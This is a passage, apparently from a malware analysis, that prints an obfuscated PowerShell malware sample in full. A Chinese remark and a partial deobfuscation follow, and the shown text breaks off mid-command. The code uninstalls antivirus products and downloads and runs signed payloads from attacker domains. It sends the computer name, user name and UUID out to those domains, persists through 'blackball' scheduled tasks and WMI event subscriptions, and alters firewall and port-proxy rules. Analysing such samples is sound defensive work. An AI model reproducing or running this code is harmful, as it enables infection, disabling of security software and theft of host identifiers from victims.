 ; "(('.( hCNVErbosepREFEReNcE.TOstRiNG()[1,3]+tfUxtf'+'U-JoIntfUtfU) ( ((tfUcm'+'d /c start /b wmic.extfU+tfUe product where cFwname like uOs%Eset%uOscFw calltfU+tfU uninstall /n'+'oint'+'eractive'+'cmd'+' '+'/c start /b wmic.exe product whe'+'re cFwname '+'like tfU+tfUuOs%%K'+'asp'+'er'+'sky%%uOsc'+'Fw call uninstall /nointeractivecmd /c start /b wmic.exe product where cFwname '+'like uOs%avtfU+tfUast%uOscFw call uninstall /nointeractivecmd /c start /b wmic.exe tfU+tfUproduct w'+'here tfU+tf'+'UcFwname like uOs%avp%uOsc'+'Fw catfU+tfUll uninstal'+'ltfU+tfU /nointeractivecmd /c start /b wmic.exe product'+' where cFwname like uOs%Security%uOscFw call '+'uni'+'nstall /nointeractivecmd /c start /b wmic.exe produc'+'t where cFwname like uOs%AntiVirus%uOscFw call uni'+'n'+'stall /'+'nointeractivecmd /c start /b wmic.exe product where cFwnametfU+tfU like uOs%Norton Security%uOscFw call uninstall /noi'+'nteractivecmd /c cFwC:9'+'RTProgra~19RTMalwarebytes9RTAnti-Malware9RTunins000.extfU+'+'tfUecFw /verysilent'+' /suppressmsgboxes /notfU+tfU'+'restartCdJv=cFw?'+'CdJvcFw+(Get-Date '+'-Format uOs_yyyyMMdduOs)CdJtmps=uOsfunction a(CdJu){CdJd=(Nefvpw'+'-Objfvp'+'ect Net.WebCfvplient).cFwDownloadDatacFw(CdJu)'+';Cd'+'Jc=CdJd.count;if(C'+'dJc -gt 173){Cd'+'Jb=CdJd[173..CdJc];CdJp=NtfU+tfUew-Object Security.Cryptography.tfU+tfURSAParameters;CdtfU+tfUJtfU+'+'tfUp.Modulus='+'[cotfU+tfUnvert]::FrotfU+tfUmBase64String(u'+'OsuOs2mWo17uX'+'vG1B'+'Xpm'+'dgv8v/3NTmnNubHtV6'+'2fWrk4jPtfU'+'+tfUF'+'I9wM3NN2tfU+tfUvzTzticIYHlm7K3r'+'2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv'+'1j1feIY6R7rpfqOLdHa10=uOstfU+tfUuOs);CdJp.ExpotfU+tfUnent=0x01,0x00tfU+'+'tfU,0x01;CdJr=New-Object Secu'+'rity.Cryptography.RSACryptoServiceProtfU+tfUvider;CdJr.Im'+'portParameters(Cd'+'JptfU+tfU);if(CdJtfU+tfUr.veri'+'fyData'+'(CdJb,(New-O'+'bject Security.Cryptography.SHA1'+'CryptoSetfU+tfUrtfU+tfUviceProvider)tfU+tfU,'+'[convert]::FromBase64String(-jtfU+tfUoin([char[]]Cd'+'Jd[0..171tfU+tfU]))))tfU+tfU{Ifvpex(-join'+'[char[]]CdJb)}}}CdJurl=utfU+tfUOsuOshttp://uOsuOstfU+tfU+uOsuOsU1uOsuOs+uOsuOsU2uOsuOs;a(CdJurl+uOsuOs/a.jspuOs+CdJvtfU+tfU+uOs?uOsuOs+(@(CdJenv:COMPtfU+tfU'+'UTERNAME,CdJenv:USERNAME,(get-wmiobject Win32tfU+tfU_ComputerSystemProd'+'uct).UUID,(random))-joinuOsuOs*'+'uOsuOs))uOsCdJsa=([SecuritfU+tfUty'+'.Principal.WindowsPrincipal][Security.Principal.W'+'indowsIdentity]::GetCurrent()).IsInRole([Se'+'ctfU+tfUurity.Princitf'+'U+tfUpaltfU+tfU.WtfU+t'+'fU'+'indowsBuiltfU+tfUtInRole] cFw'+'A'+'dministratorcFw)funct'+'ion getRan(tfU+tfU){return -join([char[]](48..57+65tfU+tfU..90+97..122)T'+'jQGet-Random -Count (6+(Get-Random'+')%6))}CdJus=@(uOst.zz3r0.tfU+tfUcotfU+tfUmuOs,uOst.zer9g.comuOs,uOst.amynx.c'+'omuOs)tfU+tfUCdJstsrv = New-Object -ComObject Schedule.ServicetfU+tf'+'UCdJ'+'stsrv.Connect()try{CdJdo'+'it=CdJstsrv.Ge'+'tFolder(cFw9RTcFw).GetTask(ctfU'+'+tfUFwblackballctfU'+'+tfU'+'Fw'+')}catch{}if(-not CdJdoit){    if(CdJsa){        schtasks'+' /c'+'reate /ru system /sc MINUTE /mo 120tfU+tfU /tn blackball /F /tr c'+'Fwb'+'lackballcFw    } else {        schtasks /create /tfU+tfUsc MINUTE /tfU+tfUmo 120 /tn '+'blackball /F /tr cF'+'wblackballcFw    }    foreach(CdJu in CdJus){        CdJi = [array]::IndexOf(CtfU+tfUdJus,CdJu)        if(CdJi%3 -eq 0){CdJtn'+'f=uOsu'+'tfU+tfUOs}        if(CdJt'+'fU+tfUi%3 -eq 1){CdJtnf=getRan}        if'+'(CdJi%3tfU+tfU -eq 2){if(CdJsa){CdJtnf=uOsMictfU'+'+tfUroSoft9R'+'TWindows9RTuOs+(getRan)}else{CdJtnf=gettf'+'U'+'+t'+'fURan}}        CdJtn = getRan        if(CdJsa){            schtatfU'+'+tfUsks /create /ru system /sc MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw        } else {            schtasks /creat'+'et'+'fU+tfU /sc '+'MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw        }'+''+'        start-sleep 1        CdJfolder=CdJstsrv.GetFolder(cFw9RTCdtfU+tfUJtnfcFw)        CdJtaskitem=CdJfolder.GetTasks(1tfU+tfU)        foreatfU+tfUch(CdJtfU+tfUtask in CdJtaskitem'+'){            foreach (CdJatfU+tfUction in CdJtask.DefitfU+tfUnition.Ac'+'tions) {                try{                    if(CdJaction.ArgumtfU+tfUents.C'+'ontains'+'(cFwPS'+'_CMDcFw)){                            C'+'dJfolder.RegisterTask(CdJtask.Name, CdJtask.Xml.replace(cFwPS_CMDcFw,CdJtmps.replace(u'+'OsU1uOs,CdJu.substring(0,5t'+'fU+tfU)).replace(uOsU2uOs,CdJu.substring'+'(5))), 4, '+'CdJnull, CdJnull, 0, CdtfU'+'+tfUJnull)TjQout-null                '+'    }                }catch{}            }tfU+tfU        }        start-tf'+'U+tfUsleep 1        schtasks /run /tn cFwCdJtnf9RTCdJtncFw'+'        stfU+tfUt'+'art-sleetf'+'U+'+'tfUp 5    }'+'}try{CdJdoit1=Get-WMIObject -Class __EventFilter -tfU+tfUNameSpace uOsroot9RTsubscriptiotfU+tfUnuOs -filter cFwName=tfU+tf'+'UuOsblackballuOscFw}catch{}'+'if(-not '+'CdJdoit1){    Set-WmiInstance -Class __EventFilter -NameSpace ctfU+tfUFwroot9R'+'TsubscrtfU+tfUiptioncFw -ArgumtfU+tfUents @{Name='+'cFwblackballcFw;EventNameSpace=cFwroot9RTctfU+tfUimv2cFw;QueryLangua'+'ge=cFwWQLcFw;Query=cF'+'wSELECT * FROM __InstanceModi'+'ficationEvent WITHIN '+'3600 WHERE TargetInstance ISA uOsWin32_PerfFormattedData_PerfOS_StfU+tfUystemuOscFw;} -ErrorAction Stop    tfU+tfUforeach(CdJu in CdJus){tf'+'U+tf'+'U    '+'    CdJtheName=get'+'Ran'+'        CdJwmicmd=CdJtmps.replace(uOsU1uOs,CdJu.subs'+'tring('+'0,5)).replace(uOsU2uOstfU+tfU,CdJu.'+'substring(5)).replace(uOsa.jspuOs,uOsaa.jspuOs)  '+'      Set-WmiInstance -Class __FilterToConsumerBinding -Namespace'+' cFwrtfU+tfUoot9t'+'fU+tfU'+'RTsubscriptioncFwtfU+tfU -Arguments @{Filter=(Set-WmiInstance -Class __Eve'+'ntFilter -NameSpace cFwroot9RTsubscri'+'ptioncFw'+' -Argument'+'s @{Name=cFwfcFw+CdJtheName;EventNameSpace=c'+'Fwroot9tfU+tfURTcimv2cFw;QueryLanguage=cFwWQLcFw;Query=c'+'FwSELECT * FROM __InstanceModificatfU+tfUtiotfU+t'+'fUnEvent WITHIN 3600 WHERE tfU+'+'tfUTargetIn'+'stantfU+tfUce ISA uOsWin32_PerfFormat'+'tedDatatfU+tfU_PertfU+tfUfOS_SystemuOscFw;} -ErrorAt'+'fU+tfUctio'+'n Stop);Consu'+'mer=(Set-WmiInstance -Class CotfU+tfU'+'mmandLineEventConsume'+'r '+'-NamespactfU+tfUe cFwrotfU+tfUot9RTsubscriptioncFw -Arguments @{Name=cFwcc'+'Fw+CdJtheN'+'am'+'e;ExecutablePath=cFwc:9RTwindows9RTsystem329RTcmd.execFw;CommandLineTe'+'mplate=cFw/c power'+'shell -w hidden -c '+'CdJw'+'micmdcFtfU+'+'tfU'+'w})}        start'+'-sleep 5'+'  '+'  '+'}tfU+tfU    cmd'+'.exe /c netsh.exe firewall add portopening tcp'+' 65529 SDNSd    netsh.exe intertfU+tfUface tfU+tfUptfU+tfUortproxy add v4tov4 listenport=65529 ctfU+tfUonnectaddress=1.1.1.1 connectport=53    netsh advfirewtfU+tfUall firewall ad'+'d rule name=ctfU+tfUFwde'+'ny4'+'45cFw dir=in protocol='+'tcp tfU+tfUlocalport=445 action=block    netsh advfirewall firewall add rule tfU+tf'+'Uname=cFwdeny135c'+'tfU+tfUF'+'w dir=in protocol='+'t'+'cp lo'+'calport=135 ac'+'tion=block    Set-ItemProperty -Path cFwHKLM:9RTSYSTEM9RTCurrentControlSet9RTServices9RTLanmanServer9RTParame'+'ter'+'scFw DisableCompression -Type tfU+'+'tfUDWORD -Valu'+'e 1 ???Force}schtasks /delete /tfU+tfUtn Rtsa2 /F'+'schtasks /deletfU+tfUte /tn Rtsa1 /Fschtasks /delete /tn Rtsa /FtfU)-cREplaCe  ([CHaR]1'+'02+[CHaR]118+[CHaR]11'+'2),[CHaR]96  -RepLaCE tfU9RTtfU,[CH'+'aR]92 '+'-cREplaCetfUCdJtfU,[CHaR]36-RepLaCEtfUTjQtfU,[CHa'+'R]124 -cREplaCe'+' ([CHaR]117+[CHaR]7'+'9+[CHaR]115),[CHa'+'R]39-R'+'epLaCE([CHa'+'R]99+[C'+'HaR]70+[CHaR]119),[CHaR]34) )'+'') -ReplaCE  'tfU',[CHaR]39  -ReplaCE  'hCN',[CHaR]36)| &( $pShOMe[21]+$PSHOme[34]+'x')" =  lh2$

继续处理混淆后如下

cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractivecmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractivecmd /